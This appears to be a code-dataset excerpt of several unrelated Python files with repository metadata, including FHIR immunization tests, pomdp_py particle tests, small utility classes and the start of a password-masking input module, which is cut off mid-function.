| 29.469649 | 71 | 0.539029 | 1,021 | 9,224 | 4.693438 | 0.066601 | 0.26586 | 0.052588 | 0.064274 | 0.953673 | 0.945743 | 0.943656 | 0.943239 | 0.943239 | 0.943239 | 0 | 0.012149 | 0.277212 | 9,224 | 312 | 72 | 29.564103 | 0.706615 | 0 | 0 | 0.791822 | 0 | 0 | 0.212056 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052045 | false | 0 | 0.003717 | 0 | 0.107807 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
7a86094893730f5c8746957fa79a80a20e4be3be | 336 | py | Python | exception.py | windkeepblow/WeiboCrawler | e069da70345d422439c1422103e32df54cb68c3f | [
"MIT"
] | 5 | 2016-03-15T16:34:44.000Z | 2019-05-13T05:42:37.000Z | exception.py | windkeepblow/WeiboCrawler | e069da70345d422439c1422103e32df54cb68c3f | [
"MIT"
] | null | null | null | exception.py | windkeepblow/WeiboCrawler | e069da70345d422439c1422103e32df54cb68c3f | [
"MIT"
] | null | null | null | class CookieExpiredException(Exception):
def __init__(self, info):
Exception.__init__(self)
self.info = info
class WriteInfoException(Exception):
def __init__(self, info):
Exception.__init__(self)
self.info = info
class ParseInfoException(Exception):
def __init__(self, info):
Exception.__init__(self)
self.info = info
| 22.4 | 40 | 0.761905 | 39 | 336 | 5.948718 | 0.230769 | 0.206897 | 0.206897 | 0.258621 | 0.728448 | 0.728448 | 0.728448 | 0.728448 | 0.728448 | 0.728448 | 0 | 0 | 0.130952 | 336 | 14 | 41 | 24 | 0.794521 | 0 | 0 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
7aa83abd5ba72769228fc2b6fc2a4b441acfa9e0 | 1,190 | py | Python | qas/framework/retry_until.py | hatlonely/qas | c78dd549a3709802873a1710f05d92f0aa0bd098 | [
"Apache-2.0"
] | 2 | 2022-03-01T07:53:10.000Z | 2022-03-30T15:28:23.000Z | qas/framework/retry_until.py | hatlonely/qas | c78dd549a3709802873a1710f05d92f0aa0bd098 | [
"Apache-2.0"
] | null | null | null | qas/framework/retry_until.py | hatlonely/qas | c78dd549a3709802873a1710f05d92f0aa0bd098 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
import datetime
import durationpy
from ..util import merge
class RetryError(Exception):
pass
class UntilError(Exception):
pass
class Retry:
attempts: int
delay: datetime.timedelta
condition: str
def __init__(self, args):
args = merge(args, {
"attempts": 1,
"delay": "1s",
"cond": "",
})
self.attempts = args["attempts"]
self.delay = durationpy.from_str(args["delay"])
self.condition = args["cond"]
def __repr__(self):
return "cond: [{}], attempts: {}, delay: {}".format(self.condition, self.attempts, durationpy.to_str(self.delay))
class Until:
attempts: int
delay: datetime.timedelta
condition: str
def __init__(self, args):
args = merge(args, {
"attempts": 1,
"delay": "1s",
"cond": "",
})
self.attempts = args["attempts"]
self.delay = durationpy.from_str(args["delay"])
self.condition = args["cond"]
def __repr__(self):
return "cond: [{}], attempts: {}, delay: {}".format(self.condition, self.attempts, durationpy.to_str(self.delay))
| 22.45283 | 121 | 0.57563 | 126 | 1,190 | 5.277778 | 0.269841 | 0.07218 | 0.054135 | 0.07218 | 0.78797 | 0.78797 | 0.78797 | 0.78797 | 0.78797 | 0.78797 | 0 | 0.005814 | 0.277311 | 1,190 | 52 | 122 | 22.884615 | 0.767442 | 0.017647 | 0 | 0.810811 | 0 | 0 | 0.121575 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.108108 | false | 0.054054 | 0.081081 | 0.054054 | 0.513514 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 8 |
8f8d2c79ec3a949f3f47fbae728d5d9e628628eb | 113 | py | Python | utils/guild_icon.py | ChrissisCodeXD/Hikari-TestProject | 236c8fc9081172d9edff6d629e5d11c5abe64205 | [
"MIT"
] | null | null | null | utils/guild_icon.py | ChrissisCodeXD/Hikari-TestProject | 236c8fc9081172d9edff6d629e5d11c5abe64205 | [
"MIT"
] | null | null | null | utils/guild_icon.py | ChrissisCodeXD/Hikari-TestProject | 236c8fc9081172d9edff6d629e5d11c5abe64205 | [
"MIT"
] | null | null | null | def guild_icon(guild):
return f"https://cdn.discordapp.com/icons/{guild.id}/{guild.icon_hash}.png?size=1024"
| 37.666667 | 89 | 0.734513 | 19 | 113 | 4.263158 | 0.789474 | 0.222222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.038095 | 0.070796 | 113 | 2 | 90 | 56.5 | 0.733333 | 0 | 0 | 0 | 0 | 0.5 | 0.663717 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0.5 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 8 |
8fe4c31a6ef1ca14198556b9508c9d3c115db15e | 148 | py | Python | icbd/type_analyzer/tests/imports0.py | kmod/icbd | 9636564eb3993afa07c6220d589bbd1991923d74 | [
"MIT"
] | 7 | 2015-04-06T15:17:13.000Z | 2020-10-21T04:57:00.000Z | icbd/type_analyzer/tests/imports0.py | kmod/icbd | 9636564eb3993afa07c6220d589bbd1991923d74 | [
"MIT"
] | null | null | null | icbd/type_analyzer/tests/imports0.py | kmod/icbd | 9636564eb3993afa07c6220d589bbd1991923d74 | [
"MIT"
] | 4 | 2016-05-16T17:53:08.000Z | 2020-11-28T17:18:50.000Z | import import_test.a as p
p # 0 module 'a'
import_test # e 0
import import_test
import_test # 0 module 'import_test'
import_test.a # 12 module 'a'
| 18.5 | 36 | 0.743243 | 29 | 148 | 3.586207 | 0.310345 | 0.576923 | 0.307692 | 0.384615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.040984 | 0.175676 | 148 | 7 | 37 | 21.142857 | 0.811475 | 0.358108 | 0 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.833333 | 0 | 0.833333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
890a89e40032d696a7430a29872ff6738968f5c8 | 21,975 | py | Python | fhir/resources/tests/test_immunization.py | mmabey/fhir.resources | cc73718e9762c04726cd7de240c8f2dd5313cbe1 | [
"BSD-3-Clause"
] | null | null | null | fhir/resources/tests/test_immunization.py | mmabey/fhir.resources | cc73718e9762c04726cd7de240c8f2dd5313cbe1 | [
"BSD-3-Clause"
] | null | null | null | fhir/resources/tests/test_immunization.py | mmabey/fhir.resources | cc73718e9762c04726cd7de240c8f2dd5313cbe1 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Profile: http://hl7.org/fhir/StructureDefinition/Immunization
Release: R4
Version: 4.0.1
Build ID: 9346c8cc45
Last updated: 2019-11-01T09:29:23.356+11:00
"""
import io
import json
import os
import unittest
import pytest
from .. import immunization
from ..fhirdate import FHIRDate
from .fixtures import force_bytes
@pytest.mark.usefixtures("base_settings")
class ImmunizationTests(unittest.TestCase):
def instantiate_from(self, filename):
datadir = os.environ.get("FHIR_UNITTEST_DATADIR") or ""
with io.open(os.path.join(datadir, filename), "r", encoding="utf-8") as handle:
js = json.load(handle)
self.assertEqual("Immunization", js["resourceType"])
return immunization.Immunization(js)
def testImmunization1(self):
inst = self.instantiate_from("immunization-example.json")
self.assertIsNotNone(inst, "Must have instantiated a Immunization instance")
self.implImmunization1(inst)
js = inst.as_json()
self.assertEqual("Immunization", js["resourceType"])
inst2 = immunization.Immunization(js)
self.implImmunization1(inst2)
def implImmunization1(self, inst):
self.assertEqual(force_bytes(inst.doseQuantity.code), force_bytes("mg"))
self.assertEqual(
force_bytes(inst.doseQuantity.system),
force_bytes("http://unitsofmeasure.org"),
)
self.assertEqual(inst.doseQuantity.value, 5)
self.assertEqual(
force_bytes(inst.education[0].documentType),
force_bytes("253088698300010311120702"),
)
self.assertEqual(
inst.education[0].presentationDate.date, FHIRDate("2013-01-10").date
)
self.assertEqual(inst.education[0].presentationDate.as_json(), "2013-01-10")
self.assertEqual(
inst.education[0].publicationDate.date, FHIRDate("2012-07-02").date
)
self.assertEqual(inst.education[0].publicationDate.as_json(), "2012-07-02")
self.assertEqual(inst.expirationDate.date, FHIRDate("2015-02-15").date)
self.assertEqual(inst.expirationDate.as_json(), "2015-02-15")
self.assertEqual(
force_bytes(inst.fundingSource.coding[0].code), force_bytes("private")
)
self.assertEqual(
force_bytes(inst.fundingSource.coding[0].system),
force_bytes(
"http://terminology.hl7.org/CodeSystem/immunization-funding-source"
),
)
self.assertEqual(force_bytes(inst.id), force_bytes("example"))
self.assertEqual(
force_bytes(inst.identifier[0].system), force_bytes("urn:ietf:rfc:3986")
)
self.assertEqual(
force_bytes(inst.identifier[0].value),
force_bytes("urn:oid:1.3.6.1.4.1.21367.2005.3.7.1234"),
)
self.assertTrue(inst.isSubpotent)
self.assertEqual(force_bytes(inst.lotNumber), force_bytes("AAJN11K"))
self.assertEqual(force_bytes(inst.meta.tag[0].code), force_bytes("HTEST"))
self.assertEqual(
force_bytes(inst.meta.tag[0].display), force_bytes("test health data")
)
self.assertEqual(
force_bytes(inst.meta.tag[0].system),
force_bytes("http://terminology.hl7.org/CodeSystem/v3-ActReason"),
)
self.assertEqual(
force_bytes(inst.note[0].text),
force_bytes("Notes on adminstration of vaccine"),
)
self.assertEqual(inst.occurrenceDateTime.date, FHIRDate("2013-01-10").date)
self.assertEqual(inst.occurrenceDateTime.as_json(), "2013-01-10")
self.assertEqual(
force_bytes(inst.performer[0].function.coding[0].code), force_bytes("OP")
)
self.assertEqual(
force_bytes(inst.performer[0].function.coding[0].system),
force_bytes("http://terminology.hl7.org/CodeSystem/v2-0443"),
)
self.assertEqual(
force_bytes(inst.performer[1].function.coding[0].code), force_bytes("AP")
)
self.assertEqual(
force_bytes(inst.performer[1].function.coding[0].system),
force_bytes("http://terminology.hl7.org/CodeSystem/v2-0443"),
)
self.assertTrue(inst.primarySource)
self.assertEqual(
force_bytes(inst.programEligibility[0].coding[0].code),
force_bytes("ineligible"),
)
self.assertEqual(
force_bytes(inst.programEligibility[0].coding[0].system),
force_bytes(
"http://terminology.hl7.org/CodeSystem/immunization-program-eligibility"
),
)
self.assertEqual(
force_bytes(inst.reasonCode[0].coding[0].code), force_bytes("429060002")
)
self.assertEqual(
force_bytes(inst.reasonCode[0].coding[0].system),
force_bytes("http://snomed.info/sct"),
)
self.assertEqual(force_bytes(inst.route.coding[0].code), force_bytes("IM"))
self.assertEqual(
force_bytes(inst.route.coding[0].display),
force_bytes("Injection, intramuscular"),
)
self.assertEqual(
force_bytes(inst.route.coding[0].system),
force_bytes(
"http://terminology.hl7.org/CodeSystem/v3-RouteOfAdministration"
),
)
self.assertEqual(force_bytes(inst.site.coding[0].code), force_bytes("LA"))
self.assertEqual(
force_bytes(inst.site.coding[0].display), force_bytes("left arm")
)
self.assertEqual(
force_bytes(inst.site.coding[0].system),
force_bytes("http://terminology.hl7.org/CodeSystem/v3-ActSite"),
)
self.assertEqual(force_bytes(inst.status), force_bytes("completed"))
self.assertEqual(force_bytes(inst.text.status), force_bytes("generated"))
self.assertEqual(
force_bytes(inst.vaccineCode.coding[0].code), force_bytes("FLUVAX")
)
self.assertEqual(
force_bytes(inst.vaccineCode.coding[0].system),
force_bytes("urn:oid:1.2.36.1.2001.1005.17"),
)
self.assertEqual(
force_bytes(inst.vaccineCode.text), force_bytes("Fluvax (Influenza)")
)
def testImmunization2(self):
inst = self.instantiate_from("immunization-example-historical.json")
self.assertIsNotNone(inst, "Must have instantiated a Immunization instance")
self.implImmunization2(inst)
js = inst.as_json()
self.assertEqual("Immunization", js["resourceType"])
inst2 = immunization.Immunization(js)
self.implImmunization2(inst2)
def implImmunization2(self, inst):
self.assertEqual(force_bytes(inst.id), force_bytes("historical"))
self.assertEqual(
force_bytes(inst.identifier[0].system), force_bytes("urn:ietf:rfc:3986")
)
self.assertEqual(
force_bytes(inst.identifier[0].value),
force_bytes("urn:oid:1.3.6.1.4.1.21367.2005.3.7.1234"),
)
self.assertEqual(force_bytes(inst.meta.tag[0].code), force_bytes("HTEST"))
self.assertEqual(
force_bytes(inst.meta.tag[0].display), force_bytes("test health data")
)
self.assertEqual(
force_bytes(inst.meta.tag[0].system),
force_bytes("http://terminology.hl7.org/CodeSystem/v3-ActReason"),
)
self.assertEqual(
force_bytes(inst.note[0].text),
force_bytes("Notes on adminstration of a historical vaccine"),
)
self.assertEqual(
force_bytes(inst.occurrenceString), force_bytes("January 2012")
)
self.assertFalse(inst.primarySource)
self.assertEqual(
force_bytes(inst.reportOrigin.coding[0].code), force_bytes("record")
)
self.assertEqual(
force_bytes(inst.reportOrigin.coding[0].system),
force_bytes("http://terminology.hl7.org/CodeSystem/immunization-origin"),
)
self.assertEqual(
force_bytes(inst.reportOrigin.text), force_bytes("Written Record")
)
self.assertEqual(force_bytes(inst.status), force_bytes("completed"))
self.assertEqual(force_bytes(inst.text.status), force_bytes("generated"))
self.assertEqual(
force_bytes(inst.vaccineCode.coding[0].code), force_bytes("GNFLU")
)
self.assertEqual(
force_bytes(inst.vaccineCode.coding[0].system),
force_bytes("urn:oid:1.2.36.1.2001.1005.17"),
)
self.assertEqual(force_bytes(inst.vaccineCode.text), force_bytes("Influenza"))
def testImmunization3(self):
inst = self.instantiate_from("immunization-example-protocol.json")
self.assertIsNotNone(inst, "Must have instantiated a Immunization instance")
self.implImmunization3(inst)
js = inst.as_json()
self.assertEqual("Immunization", js["resourceType"])
inst2 = immunization.Immunization(js)
self.implImmunization3(inst2)
def implImmunization3(self, inst):
self.assertEqual(force_bytes(inst.doseQuantity.code), force_bytes("mg"))
self.assertEqual(
force_bytes(inst.doseQuantity.system),
force_bytes("http://unitsofmeasure.org"),
)
self.assertEqual(inst.doseQuantity.value, 5)
self.assertEqual(inst.expirationDate.date, FHIRDate("2018-12-15").date)
self.assertEqual(inst.expirationDate.as_json(), "2018-12-15")
self.assertEqual(
force_bytes(inst.fundingSource.coding[0].code), force_bytes("private")
)
self.assertEqual(
force_bytes(inst.fundingSource.coding[0].system),
force_bytes(
"http://terminology.hl7.org/CodeSystem/immunization-funding-source"
),
)
self.assertEqual(force_bytes(inst.id), force_bytes("protocol"))
self.assertEqual(
force_bytes(inst.identifier[0].system), force_bytes("urn:ietf:rfc:3986")
)
self.assertEqual(
force_bytes(inst.identifier[0].value),
force_bytes("urn:oid:1.3.6.1.4.1.21367.2005.3.7.1234"),
)
self.assertFalse(inst.isSubpotent)
self.assertEqual(force_bytes(inst.lotNumber), force_bytes("PT123F"))
self.assertEqual(force_bytes(inst.meta.tag[0].code), force_bytes("HTEST"))
self.assertEqual(
force_bytes(inst.meta.tag[0].display), force_bytes("test health data")
)
self.assertEqual(
force_bytes(inst.meta.tag[0].system),
force_bytes("http://terminology.hl7.org/CodeSystem/v3-ActReason"),
)
self.assertEqual(inst.occurrenceDateTime.date, FHIRDate("2018-06-18").date)
self.assertEqual(inst.occurrenceDateTime.as_json(), "2018-06-18")
self.assertEqual(
force_bytes(inst.performer[0].function.coding[0].code), force_bytes("OP")
)
self.assertEqual(
force_bytes(inst.performer[0].function.coding[0].system),
force_bytes("http://terminology.hl7.org/CodeSystem/v2-0443"),
)
self.assertEqual(
force_bytes(inst.performer[1].function.coding[0].code), force_bytes("AP")
)
self.assertEqual(
force_bytes(inst.performer[1].function.coding[0].system),
force_bytes("http://terminology.hl7.org/CodeSystem/v2-0443"),
)
self.assertTrue(inst.primarySource)
self.assertEqual(
force_bytes(inst.programEligibility[0].coding[0].code),
force_bytes("ineligible"),
)
self.assertEqual(
force_bytes(inst.programEligibility[0].coding[0].system),
force_bytes(
"http://terminology.hl7.org/CodeSystem/immunization-program-eligibility"
),
)
self.assertEqual(inst.protocolApplied[0].doseNumberPositiveInt, 1)
self.assertEqual(
force_bytes(inst.protocolApplied[0].series), force_bytes("2-dose")
)
self.assertEqual(
force_bytes(inst.protocolApplied[0].targetDisease[0].coding[0].code),
force_bytes("40468003"),
)
self.assertEqual(
force_bytes(inst.protocolApplied[0].targetDisease[0].coding[0].system),
force_bytes("http://snomed.info/sct"),
)
self.assertEqual(inst.protocolApplied[1].doseNumberPositiveInt, 2)
self.assertEqual(
force_bytes(inst.protocolApplied[1].series), force_bytes("3-dose")
)
self.assertEqual(
force_bytes(inst.protocolApplied[1].targetDisease[0].coding[0].code),
force_bytes("66071002"),
)
self.assertEqual(
force_bytes(inst.protocolApplied[1].targetDisease[0].coding[0].system),
force_bytes("http://snomed.info/sct"),
)
self.assertEqual(force_bytes(inst.route.coding[0].code), force_bytes("IM"))
self.assertEqual(
force_bytes(inst.route.coding[0].display),
force_bytes("Injection, intramuscular"),
)
self.assertEqual(
force_bytes(inst.route.coding[0].system),
force_bytes(
"http://terminology.hl7.org/CodeSystem/v3-RouteOfAdministration"
),
)
self.assertEqual(force_bytes(inst.site.coding[0].code), force_bytes("LA"))
self.assertEqual(
force_bytes(inst.site.coding[0].display), force_bytes("left arm")
)
self.assertEqual(
force_bytes(inst.site.coding[0].system),
force_bytes("http://terminology.hl7.org/CodeSystem/v3-ActSite"),
)
self.assertEqual(force_bytes(inst.status), force_bytes("completed"))
self.assertEqual(force_bytes(inst.text.status), force_bytes("generated"))
self.assertEqual(
force_bytes(inst.vaccineCode.coding[0].code), force_bytes("104")
)
self.assertEqual(
force_bytes(inst.vaccineCode.coding[0].system),
force_bytes("http://hl7.org/fhir/sid/cvx"),
)
self.assertEqual(
force_bytes(inst.vaccineCode.text), force_bytes("Twinrix (HepA/HepB)")
)
def testImmunization4(self):
inst = self.instantiate_from("immunization-example-refused.json")
self.assertIsNotNone(inst, "Must have instantiated a Immunization instance")
self.implImmunization4(inst)
js = inst.as_json()
self.assertEqual("Immunization", js["resourceType"])
inst2 = immunization.Immunization(js)
self.implImmunization4(inst2)
def implImmunization4(self, inst):
self.assertEqual(force_bytes(inst.id), force_bytes("notGiven"))
self.assertEqual(force_bytes(inst.meta.tag[0].code), force_bytes("HTEST"))
self.assertEqual(
force_bytes(inst.meta.tag[0].display), force_bytes("test health data")
)
self.assertEqual(
force_bytes(inst.meta.tag[0].system),
force_bytes("http://terminology.hl7.org/CodeSystem/v3-ActReason"),
)
self.assertEqual(inst.occurrenceDateTime.date, FHIRDate("2013-01-10").date)
self.assertEqual(inst.occurrenceDateTime.as_json(), "2013-01-10")
self.assertTrue(inst.primarySource)
self.assertEqual(force_bytes(inst.status), force_bytes("not-done"))
self.assertEqual(
force_bytes(inst.statusReason.coding[0].code), force_bytes("MEDPREC")
)
self.assertEqual(
force_bytes(inst.statusReason.coding[0].display),
force_bytes("medical precaution"),
)
self.assertEqual(
force_bytes(inst.statusReason.coding[0].system),
force_bytes("http://terminology.hl7.org/CodeSystem/v3-ActReason"),
)
self.assertEqual(force_bytes(inst.text.status), force_bytes("generated"))
self.assertEqual(
force_bytes(inst.vaccineCode.coding[0].code), force_bytes("01")
)
self.assertEqual(
force_bytes(inst.vaccineCode.coding[0].display), force_bytes("DTP")
)
self.assertEqual(
force_bytes(inst.vaccineCode.coding[0].system),
force_bytes("http://hl7.org/fhir/sid/cvx"),
)
def testImmunization5(self):
inst = self.instantiate_from("immunization-example-subpotent.json")
self.assertIsNotNone(inst, "Must have instantiated a Immunization instance")
self.implImmunization5(inst)
js = inst.as_json()
self.assertEqual("Immunization", js["resourceType"])
inst2 = immunization.Immunization(js)
self.implImmunization5(inst2)
def implImmunization5(self, inst):
self.assertEqual(force_bytes(inst.doseQuantity.code), force_bytes("ml"))
self.assertEqual(
force_bytes(inst.doseQuantity.system),
force_bytes("http://unitsofmeasure.org"),
)
self.assertEqual(inst.doseQuantity.value, 0.5)
self.assertEqual(
force_bytes(inst.education[0].documentType),
force_bytes("253088698300010311120702"),
)
self.assertEqual(
inst.education[0].presentationDate.date, FHIRDate("2013-01-10").date
)
self.assertEqual(inst.education[0].presentationDate.as_json(), "2013-01-10")
self.assertEqual(
inst.education[0].publicationDate.date, FHIRDate("2012-07-02").date
)
self.assertEqual(inst.education[0].publicationDate.as_json(), "2012-07-02")
self.assertEqual(inst.expirationDate.date, FHIRDate("2015-02-28").date)
self.assertEqual(inst.expirationDate.as_json(), "2015-02-28")
self.assertEqual(
force_bytes(inst.fundingSource.coding[0].code), force_bytes("private")
)
self.assertEqual(
force_bytes(inst.fundingSource.coding[0].system),
force_bytes(
"http://terminology.hl7.org/CodeSystem/immunization-funding-source"
),
)
self.assertEqual(force_bytes(inst.id), force_bytes("subpotent"))
self.assertEqual(
force_bytes(inst.identifier[0].system), force_bytes("urn:ietf:rfc:3986")
)
self.assertEqual(
force_bytes(inst.identifier[0].value),
force_bytes("urn:oid:1.3.6.1.4.1.21367.2005.3.7.1234"),
)
self.assertFalse(inst.isSubpotent)
self.assertEqual(force_bytes(inst.lotNumber), force_bytes("AAJN11K"))
self.assertEqual(force_bytes(inst.meta.tag[0].code), force_bytes("HTEST"))
self.assertEqual(
force_bytes(inst.meta.tag[0].display), force_bytes("test health data")
)
self.assertEqual(
force_bytes(inst.meta.tag[0].system),
force_bytes("http://terminology.hl7.org/CodeSystem/v3-ActReason"),
)
self.assertEqual(
force_bytes(inst.note[0].text),
force_bytes("Notes on adminstration of vaccine"),
)
self.assertEqual(inst.occurrenceDateTime.date, FHIRDate("2015-01-15").date)
self.assertEqual(inst.occurrenceDateTime.as_json(), "2015-01-15")
self.assertEqual(
force_bytes(inst.performer[0].function.coding[0].code), force_bytes("OP")
)
self.assertEqual(
force_bytes(inst.performer[0].function.coding[0].system),
force_bytes("http://terminology.hl7.org/CodeSystem/v2-0443"),
)
self.assertEqual(
force_bytes(inst.performer[1].function.coding[0].code), force_bytes("AP")
)
self.assertEqual(
force_bytes(inst.performer[1].function.coding[0].system),
force_bytes("http://terminology.hl7.org/CodeSystem/v2-0443"),
)
self.assertTrue(inst.primarySource)
self.assertEqual(
force_bytes(inst.programEligibility[0].coding[0].code),
force_bytes("ineligible"),
)
self.assertEqual(
force_bytes(inst.programEligibility[0].coding[0].system),
force_bytes(
"http://terminology.hl7.org/CodeSystem/immunization-program-eligibility"
),
)
self.assertEqual(force_bytes(inst.route.coding[0].code), force_bytes("IM"))
self.assertEqual(
force_bytes(inst.route.coding[0].display),
force_bytes("Injection, intramuscular"),
)
self.assertEqual(
force_bytes(inst.route.coding[0].system),
force_bytes(
"http://terminology.hl7.org/CodeSystem/v3-RouteOfAdministration"
),
)
self.assertEqual(force_bytes(inst.site.coding[0].code), force_bytes("LT"))
self.assertEqual(
force_bytes(inst.site.coding[0].display), force_bytes("left thigh")
)
self.assertEqual(
force_bytes(inst.site.coding[0].system),
force_bytes("http://terminology.hl7.org/CodeSystem/v3-ActSite"),
)
self.assertEqual(force_bytes(inst.status), force_bytes("completed"))
self.assertEqual(
force_bytes(inst.subpotentReason[0].coding[0].code), force_bytes("partial")
)
self.assertEqual(
force_bytes(inst.subpotentReason[0].coding[0].system),
force_bytes(
"http://terminology.hl7.org/CodeSystem/immunization-subpotent-reason"
),
)
self.assertEqual(force_bytes(inst.text.status), force_bytes("generated"))
self.assertEqual(
force_bytes(inst.vaccineCode.coding[0].code), force_bytes("GNHEP")
)
self.assertEqual(
force_bytes(inst.vaccineCode.coding[0].system),
force_bytes("urn:oid:1.2.36.1.2001.1005.17"),
)
self.assertEqual(force_bytes(inst.vaccineCode.text), force_bytes("Hepatitis B"))
| 42.42278 | 88 | 0.625028 | 2,385 | 21,975 | 5.642348 | 0.097275 | 0.188006 | 0.187263 | 0.234079 | 0.895148 | 0.88519 | 0.876793 | 0.84209 | 0.817121 | 0.79245 | 0 | 0.041302 | 0.240865 | 21,975 | 517 | 89 | 42.504836 | 0.765376 | 0.008009 | 0 | 0.603272 | 0 | 0.00818 | 0.16103 | 0.021798 | 0 | 0 | 0 | 0 | 0.351738 | 1 | 0.022495 | false | 0 | 0.01636 | 0 | 0.042945 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
64e5ed45e80438a3cebbc194dccf86b617bb2922 | 1,792 | py | Python | tests/test_particles.py | justinchiu/pomdp-py | 27fd8cc3b215b428289d89ec9ed44d88910fc4ea | [
"MIT"
] | 87 | 2020-02-16T03:12:10.000Z | 2022-03-31T08:38:10.000Z | tests/test_particles.py | justinchiu/pomdp-py | 27fd8cc3b215b428289d89ec9ed44d88910fc4ea | [
"MIT"
] | 15 | 2020-08-01T00:25:33.000Z | 2022-02-19T22:37:11.000Z | tests/test_particles.py | justinchiu/pomdp-py | 27fd8cc3b215b428289d89ec9ed44d88910fc4ea | [
"MIT"
] | 26 | 2020-02-20T01:15:33.000Z | 2022-03-30T16:21:37.000Z | import pomdp_py
import random
description = "testing particle representation"
def test_particles():
random_dist = {}
total_prob = 0
for v in range(4):
random_dist[f"x{v}"] = random.uniform(0, 1)
total_prob += random_dist[f"x{v}"]
for v in random_dist:
random_dist[v] /= total_prob
particles = pomdp_py.Particles.from_histogram(pomdp_py.Histogram(random_dist), num_particles=int(1e6))
for v in random_dist:
assert abs(particles[v] - random_dist[v]) <= 2e-3
counts = {}
total = int(1e6)
for i in range(total):
v = particles.random()
counts[v] = counts.get(v, 0) + 1
for v in counts:
counts[v] /= total
for v in random_dist:
assert abs(counts[v] - random_dist[v]) <= 2e-3
assert particles.mpe() == pomdp_py.Histogram(random_dist).mpe()
def test_weighted_particles():
random_dist = {}
total_prob = 0
for v in range(5):
random_dist[f"x{v}"] = random.uniform(0, 1)
total_prob += random_dist[f"x{v}"]
for v in random_dist:
random_dist[v] /= total_prob
particles = pomdp_py.WeightedParticles.from_histogram(pomdp_py.Histogram(random_dist))
assert abs(sum(particles[v] for v, _ in particles) - 1.0) <= 1e-6
for v in random_dist:
assert abs(particles[v] - random_dist[v]) <= 2e-3
counts = {}
total = int(1e6)
for i in range(total):
v = particles.random()
counts[v] = counts.get(v, 0) + 1
for v in counts:
counts[v] /= total
for v in random_dist:
assert abs(counts[v] - random_dist[v]) <= 2e-3
assert particles.mpe() == pomdp_py.Histogram(random_dist).mpe()
def run():
test_particles()
test_weighted_particles()
if __name__ == "__main__":
run()
| 25.6 | 106 | 0.619978 | 264 | 1,792 | 4.007576 | 0.17803 | 0.20794 | 0.062382 | 0.068053 | 0.79017 | 0.79017 | 0.79017 | 0.716446 | 0.716446 | 0.716446 | 0 | 0.022288 | 0.248884 | 1,792 | 69 | 107 | 25.971014 | 0.763744 | 0 | 0 | 0.705882 | 0 | 0 | 0.030692 | 0 | 0 | 0 | 0 | 0 | 0.137255 | 1 | 0.058824 | false | 0 | 0.039216 | 0 | 0.098039 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
56c2bb9a6b2db2a0e56ffd487a5f806a1b1c877d | 3,877 | py | Python | SIAModel30/stdiomaskforsia.py | SergentLime/SIA---Smart-Interactive-App | e7afedf01519bca4750101a67f12e2081d4cf171 | [
"Apache-2.0"
] | null | null | null | SIAModel30/stdiomaskforsia.py | SergentLime/SIA---Smart-Interactive-App | e7afedf01519bca4750101a67f12e2081d4cf171 | [
"Apache-2.0"
] | null | null | null | SIAModel30/stdiomaskforsia.py | SergentLime/SIA---Smart-Interactive-App | e7afedf01519bca4750101a67f12e2081d4cf171 | [
"Apache-2.0"
] | 1 | 2019-05-12T09:50:19.000Z | 2019-05-12T09:50:19.000Z | # Stdio Mask for SIA
# By Al Sweigart al@inventwithpython.com
# And used by MrGreen
__version__ = '0.0.3'
import sys
if sys.platform == 'win32':
from msvcrt import getch
def getpass(prompt='Password: ', mask='*'):
if not isinstance(prompt, str):
raise TypeError('prompt argument must be a str, not %s' % type(prompt).__name__)
if not isinstance(mask, str):
raise TypeError('mask argument must be a zero- or one-character str, not %s' % type(prompt).__name__)
if len(mask) > 1:
